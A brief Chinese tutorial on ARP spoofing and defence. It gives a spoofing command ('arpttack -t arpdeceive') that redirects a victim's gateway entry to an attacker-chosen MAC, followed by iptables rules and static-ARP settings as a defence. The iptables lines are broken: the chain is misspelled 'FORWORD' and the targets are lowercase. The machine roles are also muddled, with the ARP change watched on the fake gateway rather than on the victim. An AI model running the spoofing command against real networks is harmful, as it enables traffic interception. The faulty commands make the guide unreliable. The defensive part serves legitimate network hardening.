简单arp攻击与防守

ARP攻击

网关   ip  192.168.0.254

发动攻击的机子  A  192.168.0.155

被攻击的机子     B   192.168.0.77

伪装网关  C  192.168.0.123

网关 A B C机子在同一网段

在A中发起攻击

./arpttack -t arpdeceive -i eth0 -o 192.168.0.77 -a 192.168.0.254 -s 192.168.0.123

-o后面写被攻击机的ip，-a写网关的ip，-s表示把被攻击机的arp池中的网关ip对应的mac地址改成伪装ip的mac地址。

 

在B机子中

打开防火墙限速

iptables -A FORWORD -s 被攻击机子的ip -m limit --limit 10/m -j accept

iptables -A forword -s 被攻击机的ip  -j drop

 

观察C机子的ARP池的变化  ,发现ARP池中网关ip对应的mac地址变化

watch -n 1 arp -n

 

防御：把arp池设置成静态即可

arp -s ip地址  mac地址

把ip地址和对应的mac地址放到/etc/ethers

再将执行命令arp -f放到rc.local下